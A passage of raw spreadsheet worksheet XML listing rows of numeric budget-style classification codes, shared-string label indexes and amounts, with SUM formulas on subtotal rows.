    <row r="930" spans="1:3">
      <c r="A930" s="705">
        <v>2130333</v>
      </c>
      <c r="B930" s="705" t="s">
        <v>1632</v>
      </c>
      <c r="C930" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="931" spans="1:3">
      <c r="A931" s="705">
        <v>2130334</v>
      </c>
      <c r="B931" s="705" t="s">
        <v>1657</v>
      </c>
      <c r="C931" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="932" spans="1:3">
      <c r="A932" s="705">
        <v>2130335</v>
      </c>
      <c r="B932" s="705" t="s">
        <v>1658</v>
      </c>
      <c r="C932" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="933" spans="1:3">
      <c r="A933" s="705">
        <v>2130336</v>
      </c>
      <c r="B933" s="705" t="s">
        <v>1659</v>
      </c>
      <c r="C933" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="934" spans="1:3">
      <c r="A934" s="705">
        <v>2130337</v>
      </c>
      <c r="B934" s="705" t="s">
        <v>1660</v>
      </c>
      <c r="C934" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="935" spans="1:3">
      <c r="A935" s="705">
        <v>2130399</v>
      </c>
      <c r="B935" s="705" t="s">
        <v>1661</v>
      </c>
      <c r="C935" s="707">
        <v>2689</v>
      </c>
    </row>
    <row r="936" spans="1:3">
      <c r="A936" s="705">
        <v>21305</v>
      </c>
      <c r="B936" s="706" t="s">
        <v>1662</v>
      </c>
      <c r="C936" s="269">
        <f>SUM(C937:C946)</f>
        <v>4445</v>
      </c>
    </row>
    <row r="937" spans="1:3">
      <c r="A937" s="705">
        <v>2130501</v>
      </c>
      <c r="B937" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C937" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="938" spans="1:3">
      <c r="A938" s="705">
        <v>2130502</v>
      </c>
      <c r="B938" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C938" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="939" spans="1:3">
      <c r="A939" s="705">
        <v>2130503</v>
      </c>
      <c r="B939" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C939" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="940" spans="1:3">
      <c r="A940" s="705">
        <v>2130504</v>
      </c>
      <c r="B940" s="705" t="s">
        <v>1663</v>
      </c>
      <c r="C940" s="707">
        <v>420</v>
      </c>
    </row>
    <row r="941" spans="1:3">
      <c r="A941" s="705">
        <v>2130505</v>
      </c>
      <c r="B941" s="705" t="s">
        <v>1664</v>
      </c>
      <c r="C941" s="707">
        <v>225</v>
      </c>
    </row>
    <row r="942" spans="1:3">
      <c r="A942" s="705">
        <v>2130506</v>
      </c>
      <c r="B942" s="705" t="s">
        <v>1665</v>
      </c>
      <c r="C942" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="943" spans="1:3">
      <c r="A943" s="705">
        <v>2130507</v>
      </c>
      <c r="B943" s="705" t="s">
        <v>1666</v>
      </c>
      <c r="C943" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="944" spans="1:3">
      <c r="A944" s="705">
        <v>2130508</v>
      </c>
      <c r="B944" s="705" t="s">
        <v>1667</v>
      </c>
      <c r="C944" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="945" spans="1:3">
      <c r="A945" s="705">
        <v>2130550</v>
      </c>
      <c r="B945" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C945" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="946" spans="1:3">
      <c r="A946" s="705">
        <v>2130599</v>
      </c>
      <c r="B946" s="705" t="s">
        <v>1668</v>
      </c>
      <c r="C946" s="707">
        <v>3800</v>
      </c>
    </row>
    <row r="947" spans="1:3">
      <c r="A947" s="705">
        <v>21307</v>
      </c>
      <c r="B947" s="706" t="s">
        <v>1669</v>
      </c>
      <c r="C947" s="269">
        <f>SUM(C948:C953)</f>
        <v>5690</v>
      </c>
    </row>
    <row r="948" spans="1:3">
      <c r="A948" s="705">
        <v>2130701</v>
      </c>
      <c r="B948" s="705" t="s">
        <v>1670</v>
      </c>
      <c r="C948" s="707">
        <v>227</v>
      </c>
    </row>
    <row r="949" spans="1:3">
      <c r="A949" s="705">
        <v>2130704</v>
      </c>
      <c r="B949" s="705" t="s">
        <v>1671</v>
      </c>
      <c r="C949" s="707"/>
    </row>
    <row r="950" spans="1:3">
      <c r="A950" s="705">
        <v>2130705</v>
      </c>
      <c r="B950" s="705" t="s">
        <v>1672</v>
      </c>
      <c r="C950" s="707">
        <v>3300</v>
      </c>
    </row>
    <row r="951" spans="1:3">
      <c r="A951" s="705">
        <v>2130706</v>
      </c>
      <c r="B951" s="705" t="s">
        <v>1673</v>
      </c>
      <c r="C951" s="707">
        <v>140</v>
      </c>
    </row>
    <row r="952" spans="1:3">
      <c r="A952" s="705">
        <v>2130707</v>
      </c>
      <c r="B952" s="705" t="s">
        <v>1674</v>
      </c>
      <c r="C952" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="953" spans="1:3">
      <c r="A953" s="705">
        <v>2130799</v>
      </c>
      <c r="B953" s="705" t="s">
        <v>1675</v>
      </c>
      <c r="C953" s="707">
        <v>2023</v>
      </c>
    </row>
    <row r="954" spans="1:3">
      <c r="A954" s="705">
        <v>21308</v>
      </c>
      <c r="B954" s="706" t="s">
        <v>1676</v>
      </c>
      <c r="C954" s="269">
        <f>SUM(C955:C959)</f>
        <v>2969</v>
      </c>
    </row>
    <row r="955" spans="1:3">
      <c r="A955" s="705">
        <v>2130801</v>
      </c>
      <c r="B955" s="705" t="s">
        <v>1677</v>
      </c>
      <c r="C955" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="956" spans="1:3">
      <c r="A956" s="705">
        <v>2130803</v>
      </c>
      <c r="B956" s="705" t="s">
        <v>1678</v>
      </c>
      <c r="C956" s="707">
        <v>2969</v>
      </c>
    </row>
    <row r="957" spans="1:3">
      <c r="A957" s="705">
        <v>2130804</v>
      </c>
      <c r="B957" s="705" t="s">
        <v>1679</v>
      </c>
      <c r="C957" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="958" spans="1:3">
      <c r="A958" s="705">
        <v>2130805</v>
      </c>
      <c r="B958" s="705" t="s">
        <v>1680</v>
      </c>
      <c r="C958" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="959" spans="1:3">
      <c r="A959" s="705">
        <v>2130899</v>
      </c>
      <c r="B959" s="705" t="s">
        <v>1681</v>
      </c>
      <c r="C959" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="960" spans="1:3">
      <c r="A960" s="705">
        <v>21309</v>
      </c>
      <c r="B960" s="706" t="s">
        <v>1682</v>
      </c>
      <c r="C960" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="961" spans="1:3">
      <c r="A961" s="705">
        <v>2130901</v>
      </c>
      <c r="B961" s="705" t="s">
        <v>1683</v>
      </c>
      <c r="C961" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="962" spans="1:3">
      <c r="A962" s="705">
        <v>2130999</v>
      </c>
      <c r="B962" s="705" t="s">
        <v>1684</v>
      </c>
      <c r="C962" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="963" spans="1:3">
      <c r="A963" s="705">
        <v>21399</v>
      </c>
      <c r="B963" s="706" t="s">
        <v>1685</v>
      </c>
      <c r="C963" s="269">
        <v>110</v>
      </c>
    </row>
    <row r="964" spans="1:3">
      <c r="A964" s="705">
        <v>2139901</v>
      </c>
      <c r="B964" s="705" t="s">
        <v>1686</v>
      </c>
      <c r="C964" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="965" spans="1:3">
      <c r="A965" s="705">
        <v>2139999</v>
      </c>
      <c r="B965" s="705" t="s">
        <v>1687</v>
      </c>
      <c r="C965" s="707">
        <v>110</v>
      </c>
    </row>
    <row r="966" spans="1:3">
      <c r="A966" s="705">
        <v>214</v>
      </c>
      <c r="B966" s="706" t="s">
        <v>1688</v>
      </c>
      <c r="C966" s="269">
        <v>5509</v>
      </c>
    </row>
    <row r="967" spans="1:3">
      <c r="A967" s="705">
        <v>21401</v>
      </c>
      <c r="B967" s="706" t="s">
        <v>1689</v>
      </c>
      <c r="C967" s="269">
        <f>SUM(C968:C988)</f>
        <v>4972</v>
      </c>
    </row>
    <row r="968" spans="1:3">
      <c r="A968" s="705">
        <v>2140101</v>
      </c>
      <c r="B968" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C968" s="707">
        <v>1600</v>
      </c>
    </row>
    <row r="969" spans="1:3">
      <c r="A969" s="705">
        <v>2140102</v>
      </c>
      <c r="B969" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C969" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="970" spans="1:3">
      <c r="A970" s="705">
        <v>2140103</v>
      </c>
      <c r="B970" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C970" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="971" spans="1:3">
      <c r="A971" s="705">
        <v>2140104</v>
      </c>
      <c r="B971" s="705" t="s">
        <v>1690</v>
      </c>
      <c r="C971" s="707">
        <v>30</v>
      </c>
    </row>
    <row r="972" spans="1:3">
      <c r="A972" s="705">
        <v>2140106</v>
      </c>
      <c r="B972" s="705" t="s">
        <v>1691</v>
      </c>
      <c r="C972" s="707">
        <v>420</v>
      </c>
    </row>
    <row r="973" spans="1:3">
      <c r="A973" s="705">
        <v>2140109</v>
      </c>
      <c r="B973" s="705" t="s">
        <v>1692</v>
      </c>
      <c r="C973" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="974" spans="1:3">
      <c r="A974" s="705">
        <v>2140110</v>
      </c>
      <c r="B974" s="705" t="s">
        <v>1693</v>
      </c>
      <c r="C974" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="975" spans="1:3">
      <c r="A975" s="705">
        <v>2140111</v>
      </c>
      <c r="B975" s="705" t="s">
        <v>1694</v>
      </c>
      <c r="C975" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="976" spans="1:3">
      <c r="A976" s="705">
        <v>2140112</v>
      </c>
      <c r="B976" s="705" t="s">
        <v>1695</v>
      </c>
      <c r="C976" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="977" spans="1:3">
      <c r="A977" s="705">
        <v>2140114</v>
      </c>
      <c r="B977" s="705" t="s">
        <v>1696</v>
      </c>
      <c r="C977" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="978" spans="1:3">
      <c r="A978" s="705">
        <v>2140122</v>
      </c>
      <c r="B978" s="705" t="s">
        <v>1697</v>
      </c>
      <c r="C978" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="979" spans="1:3">
      <c r="A979" s="705">
        <v>2140123</v>
      </c>
      <c r="B979" s="705" t="s">
        <v>1698</v>
      </c>
      <c r="C979" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="980" spans="1:3">
      <c r="A980" s="705">
        <v>2140127</v>
      </c>
      <c r="B980" s="705" t="s">
        <v>1699</v>
      </c>
      <c r="C980" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="981" spans="1:3">
      <c r="A981" s="705">
        <v>2140128</v>
      </c>
      <c r="B981" s="705" t="s">
        <v>1700</v>
      </c>
      <c r="C981" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="982" spans="1:3">
      <c r="A982" s="705">
        <v>2140129</v>
      </c>
      <c r="B982" s="705" t="s">
        <v>1701</v>
      </c>
      <c r="C982" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="983" spans="1:3">
      <c r="A983" s="705">
        <v>2140130</v>
      </c>
      <c r="B983" s="705" t="s">
        <v>1702</v>
      </c>
      <c r="C983" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="984" spans="1:3">
      <c r="A984" s="705">
        <v>2140131</v>
      </c>
      <c r="B984" s="705" t="s">
        <v>1703</v>
      </c>
      <c r="C984" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="985" spans="1:3">
      <c r="A985" s="705">
        <v>2140133</v>
      </c>
      <c r="B985" s="705" t="s">
        <v>1704</v>
      </c>
      <c r="C985" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="986" spans="1:3">
      <c r="A986" s="705">
        <v>2140136</v>
      </c>
      <c r="B986" s="705" t="s">
        <v>1705</v>
      </c>
      <c r="C986" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="987" spans="1:3">
      <c r="A987" s="705">
        <v>2140138</v>
      </c>
      <c r="B987" s="705" t="s">
        <v>1706</v>
      </c>
      <c r="C987" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="988" spans="1:3">
      <c r="A988" s="705">
        <v>2140199</v>
      </c>
      <c r="B988" s="705" t="s">
        <v>1707</v>
      </c>
      <c r="C988" s="707">
        <v>2922</v>
      </c>
    </row>
    <row r="989" spans="1:3">
      <c r="A989" s="705">
        <v>21402</v>
      </c>
      <c r="B989" s="706" t="s">
        <v>1708</v>
      </c>
      <c r="C989" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="990" spans="1:3">
      <c r="A990" s="705">
        <v>2140201</v>
      </c>
      <c r="B990" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C990" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="991" spans="1:3">
      <c r="A991" s="705">
        <v>2140202</v>
      </c>
      <c r="B991" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C991" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="992" spans="1:3">
      <c r="A992" s="705">
        <v>2140203</v>
      </c>
      <c r="B992" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C992" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="993" spans="1:3">
      <c r="A993" s="705">
        <v>2140204</v>
      </c>
      <c r="B993" s="705" t="s">
        <v>1709</v>
      </c>
      <c r="C993" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="994" spans="1:3">
      <c r="A994" s="705">
        <v>2140205</v>
      </c>
      <c r="B994" s="705" t="s">
        <v>1710</v>
      </c>
      <c r="C994" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="995" spans="1:3">
      <c r="A995" s="705">
        <v>2140206</v>
      </c>
      <c r="B995" s="705" t="s">
        <v>1711</v>
      </c>
      <c r="C995" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="996" spans="1:3">
      <c r="A996" s="705">
        <v>2140207</v>
      </c>
      <c r="B996" s="705" t="s">
        <v>1712</v>
      </c>
      <c r="C996" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="997" spans="1:3">
      <c r="A997" s="705">
        <v>2140208</v>
      </c>
      <c r="B997" s="705" t="s">
        <v>1713</v>
      </c>
      <c r="C997" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="998" spans="1:3">
      <c r="A998" s="705">
        <v>2140299</v>
      </c>
      <c r="B998" s="705" t="s">
        <v>1714</v>
      </c>
      <c r="C998" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="999" spans="1:3">
      <c r="A999" s="705">
        <v>21403</v>
      </c>
      <c r="B999" s="706" t="s">
        <v>1715</v>
      </c>
      <c r="C999" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1000" spans="1:3">
      <c r="A1000" s="705">
        <v>2140301</v>
      </c>
      <c r="B1000" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1000" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1001" spans="1:3">
      <c r="A1001" s="705">
        <v>2140302</v>
      </c>
      <c r="B1001" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1001" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1002" spans="1:3">
      <c r="A1002" s="705">
        <v>2140303</v>
      </c>
      <c r="B1002" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1002" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1003" spans="1:3">
      <c r="A1003" s="705">
        <v>2140304</v>
      </c>
      <c r="B1003" s="705" t="s">
        <v>1716</v>
      </c>
      <c r="C1003" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1004" spans="1:3">
      <c r="A1004" s="705">
        <v>2140305</v>
      </c>
      <c r="B1004" s="705" t="s">
        <v>1717</v>
      </c>
      <c r="C1004" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1005" spans="1:3">
      <c r="A1005" s="705">
        <v>2140306</v>
      </c>
      <c r="B1005" s="705" t="s">
        <v>1718</v>
      </c>
      <c r="C1005" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1006" spans="1:3">
      <c r="A1006" s="705">
        <v>2140307</v>
      </c>
      <c r="B1006" s="705" t="s">
        <v>1719</v>
      </c>
      <c r="C1006" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1007" spans="1:3">
      <c r="A1007" s="705">
        <v>2140308</v>
      </c>
      <c r="B1007" s="705" t="s">
        <v>1720</v>
      </c>
      <c r="C1007" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1008" spans="1:3">
      <c r="A1008" s="705">
        <v>2140399</v>
      </c>
      <c r="B1008" s="705" t="s">
        <v>1721</v>
      </c>
      <c r="C1008" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1009" spans="1:3">
      <c r="A1009" s="705">
        <v>21405</v>
      </c>
      <c r="B1009" s="706" t="s">
        <v>1722</v>
      </c>
      <c r="C1009" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1010" spans="1:3">
      <c r="A1010" s="705">
        <v>2140501</v>
      </c>
      <c r="B1010" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1010" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1011" spans="1:3">
      <c r="A1011" s="705">
        <v>2140502</v>
      </c>
      <c r="B1011" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1011" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1012" spans="1:3">
      <c r="A1012" s="705">
        <v>2140503</v>
      </c>
      <c r="B1012" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1012" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1013" spans="1:3">
      <c r="A1013" s="705">
        <v>2140504</v>
      </c>
      <c r="B1013" s="705" t="s">
        <v>1713</v>
      </c>
      <c r="C1013" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1014" spans="1:3">
      <c r="A1014" s="705">
        <v>2140505</v>
      </c>
      <c r="B1014" s="705" t="s">
        <v>1723</v>
      </c>
      <c r="C1014" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1015" spans="1:3">
      <c r="A1015" s="705">
        <v>2140599</v>
      </c>
      <c r="B1015" s="705" t="s">
        <v>1724</v>
      </c>
      <c r="C1015" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1016" spans="1:3">
      <c r="A1016" s="705">
        <v>21406</v>
      </c>
      <c r="B1016" s="706" t="s">
        <v>1725</v>
      </c>
      <c r="C1016" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1017" spans="1:3">
      <c r="A1017" s="705">
        <v>2140601</v>
      </c>
      <c r="B1017" s="705" t="s">
        <v>1726</v>
      </c>
      <c r="C1017" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1018" spans="1:3">
      <c r="A1018" s="705">
        <v>2140602</v>
      </c>
      <c r="B1018" s="705" t="s">
        <v>1727</v>
      </c>
      <c r="C1018" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1019" spans="1:3">
      <c r="A1019" s="705">
        <v>2140603</v>
      </c>
      <c r="B1019" s="705" t="s">
        <v>1728</v>
      </c>
      <c r="C1019" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1020" spans="1:3">
      <c r="A1020" s="705">
        <v>2140699</v>
      </c>
      <c r="B1020" s="705" t="s">
        <v>1729</v>
      </c>
      <c r="C1020" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1021" spans="1:3">
      <c r="A1021" s="705">
        <v>21499</v>
      </c>
      <c r="B1021" s="706" t="s">
        <v>1730</v>
      </c>
      <c r="C1021" s="269">
        <v>537</v>
      </c>
    </row>
    <row r="1022" spans="1:3">
      <c r="A1022" s="705">
        <v>2149901</v>
      </c>
      <c r="B1022" s="705" t="s">
        <v>1731</v>
      </c>
      <c r="C1022" s="250">
        <v>346</v>
      </c>
    </row>
    <row r="1023" spans="1:3">
      <c r="A1023" s="705">
        <v>2149999</v>
      </c>
      <c r="B1023" s="705" t="s">
        <v>1732</v>
      </c>
      <c r="C1023" s="250">
        <v>191</v>
      </c>
    </row>
    <row r="1024" spans="1:3">
      <c r="A1024" s="705">
        <v>215</v>
      </c>
      <c r="B1024" s="706" t="s">
        <v>1733</v>
      </c>
      <c r="C1024" s="269">
        <v>1462</v>
      </c>
    </row>
    <row r="1025" spans="1:3">
      <c r="A1025" s="705">
        <v>21501</v>
      </c>
      <c r="B1025" s="706" t="s">
        <v>1734</v>
      </c>
      <c r="C1025" s="269">
        <v>11</v>
      </c>
    </row>
    <row r="1026" spans="1:3">
      <c r="A1026" s="705">
        <v>2150101</v>
      </c>
      <c r="B1026" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1026" s="707">
        <v>11</v>
      </c>
    </row>
    <row r="1027" spans="1:3">
      <c r="A1027" s="705">
        <v>2150102</v>
      </c>
      <c r="B1027" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1027" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1028" spans="1:3">
      <c r="A1028" s="705">
        <v>2150103</v>
      </c>
      <c r="B1028" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1028" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1029" spans="1:3">
      <c r="A1029" s="705">
        <v>2150104</v>
      </c>
      <c r="B1029" s="705" t="s">
        <v>1735</v>
      </c>
      <c r="C1029" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1030" spans="1:3">
      <c r="A1030" s="705">
        <v>2150105</v>
      </c>
      <c r="B1030" s="705" t="s">
        <v>1736</v>
      </c>
      <c r="C1030" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1031" spans="1:3">
      <c r="A1031" s="705">
        <v>2150106</v>
      </c>
      <c r="B1031" s="705" t="s">
        <v>1737</v>
      </c>
      <c r="C1031" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1032" spans="1:3">
      <c r="A1032" s="705">
        <v>2150107</v>
      </c>
      <c r="B1032" s="705" t="s">
        <v>1738</v>
      </c>
      <c r="C1032" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1033" spans="1:3">
      <c r="A1033" s="705">
        <v>2150108</v>
      </c>
      <c r="B1033" s="705" t="s">
        <v>1739</v>
      </c>
      <c r="C1033" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1034" spans="1:3">
      <c r="A1034" s="705">
        <v>2150199</v>
      </c>
      <c r="B1034" s="705" t="s">
        <v>1740</v>
      </c>
      <c r="C1034" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1035" spans="1:3">
      <c r="A1035" s="705">
        <v>21502</v>
      </c>
      <c r="B1035" s="706" t="s">
        <v>1741</v>
      </c>
      <c r="C1035" s="269">
        <v>450</v>
      </c>
    </row>
    <row r="1036" spans="1:3">
      <c r="A1036" s="705">
        <v>2150201</v>
      </c>
      <c r="B1036" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1036" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1037" spans="1:3">
      <c r="A1037" s="705">
        <v>2150202</v>
      </c>
      <c r="B1037" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1037" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1038" spans="1:3">
      <c r="A1038" s="705">
        <v>2150203</v>
      </c>
      <c r="B1038" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1038" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1039" spans="1:3">
      <c r="A1039" s="705">
        <v>2150204</v>
      </c>
      <c r="B1039" s="705" t="s">
        <v>1742</v>
      </c>
      <c r="C1039" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1040" spans="1:3">
      <c r="A1040" s="705">
        <v>2150205</v>
      </c>
      <c r="B1040" s="705" t="s">
        <v>1743</v>
      </c>
      <c r="C1040" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1041" spans="1:3">
      <c r="A1041" s="705">
        <v>2150206</v>
      </c>
      <c r="B1041" s="705" t="s">
        <v>1744</v>
      </c>
      <c r="C1041" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1042" spans="1:3">
      <c r="A1042" s="705">
        <v>2150207</v>
      </c>
      <c r="B1042" s="705" t="s">
        <v>1745</v>
      </c>
      <c r="C1042" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1043" spans="1:3">
      <c r="A1043" s="705">
        <v>2150208</v>
      </c>
      <c r="B1043" s="705" t="s">
        <v>1746</v>
      </c>
      <c r="C1043" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1044" spans="1:3">
      <c r="A1044" s="705">
        <v>2150209</v>
      </c>
      <c r="B1044" s="705" t="s">
        <v>1747</v>
      </c>
      <c r="C1044" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1045" spans="1:3">
      <c r="A1045" s="705">
        <v>2150210</v>
      </c>
      <c r="B1045" s="705" t="s">
        <v>1748</v>
      </c>
      <c r="C1045" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1046" spans="1:3">
      <c r="A1046" s="705">
        <v>2150212</v>
      </c>
      <c r="B1046" s="705" t="s">
        <v>1749</v>
      </c>
      <c r="C1046" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1047" spans="1:3">
      <c r="A1047" s="705">
        <v>2150213</v>
      </c>
      <c r="B1047" s="705" t="s">
        <v>1750</v>
      </c>
      <c r="C1047" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1048" spans="1:3">
      <c r="A1048" s="705">
        <v>2150214</v>
      </c>
      <c r="B1048" s="705" t="s">
        <v>1751</v>
      </c>
      <c r="C1048" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1049" spans="1:3">
      <c r="A1049" s="705">
        <v>2150215</v>
      </c>
      <c r="B1049" s="705" t="s">
        <v>1752</v>
      </c>
      <c r="C1049" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1050" spans="1:3">
      <c r="A1050" s="705">
        <v>2150299</v>
      </c>
      <c r="B1050" s="705" t="s">
        <v>1753</v>
      </c>
      <c r="C1050" s="707">
        <v>450</v>
      </c>
    </row>
    <row r="1051" spans="1:3">
      <c r="A1051" s="705">
        <v>21503</v>
      </c>
      <c r="B1051" s="706" t="s">
        <v>1754</v>
      </c>
      <c r="C1051" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="1052" spans="1:3">
      <c r="A1052" s="705">
        <v>2150301</v>
      </c>
      <c r="B1052" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1052" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1053" spans="1:3">
      <c r="A1053" s="705">
        <v>2150302</v>
      </c>
      <c r="B1053" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1053" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1054" spans="1:3">
      <c r="A1054" s="705">
        <v>2150303</v>
      </c>
      <c r="B1054" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1054" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1055" spans="1:3">
      <c r="A1055" s="705">
        <v>2150399</v>
      </c>
      <c r="B1055" s="705" t="s">
        <v>1755</v>
      </c>
      <c r="C1055" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1056" spans="1:3">
      <c r="A1056" s="705">
        <v>21505</v>
      </c>
      <c r="B1056" s="706" t="s">
        <v>1756</v>
      </c>
      <c r="C1056" s="269">
        <v>701</v>
      </c>
    </row>
    <row r="1057" spans="1:3">
      <c r="A1057" s="705">
        <v>2150501</v>
      </c>
      <c r="B1057" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C1057" s="707">
        <v>660</v>
      </c>
    </row>
    <row r="1058" spans="1:3">
      <c r="A1058" s="705">
        <v>2150502</v>
      </c>
      <c r="B1058" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C1058" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1059" spans="1:3">
      <c r="A1059" s="705">
        <v>2150503</v>
      </c>
      <c r="B1059" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C1059" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1060" spans="1:3">
      <c r="A1060" s="705">
        <v>2150505</v>
      </c>
      <c r="B1060" s="705" t="s">
        <v>1757</v>
      </c>
      <c r="C1060" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1061" spans="1:3">
      <c r="A1061" s="705">
        <v>2150507</v>
      </c>
      <c r="B1061" s="705" t="s">
        <v>1758</v>
      </c>
      <c r="C1061" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1062" spans="1:3">
      <c r="A1062" s="705">
        <v>2150508</v>
      </c>
      <c r="B1062" s="705" t="s">
        <v>1759</v>
      </c>
      <c r="C1062" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1063" spans="1:3">
      <c r="A1063" s="705">
        <v>2150516</v>
      </c>
      <c r="B1063" s="705" t="s">
        <v>1760</v>
      </c>
      <c r="C1063" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1064" spans="1:3">
      <c r="A1064" s="705">
        <v>2150517</v>
      </c>
      <c r="B1064" s="705" t="s">
        <v>1761</v>
      </c>
      <c r="C1064" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1065" spans="1:3">
      <c r="A1065" s="705">
        <v>2150550</v>
      </c>
      <c r="B1065" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C1065" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="1066" spans="1:3">
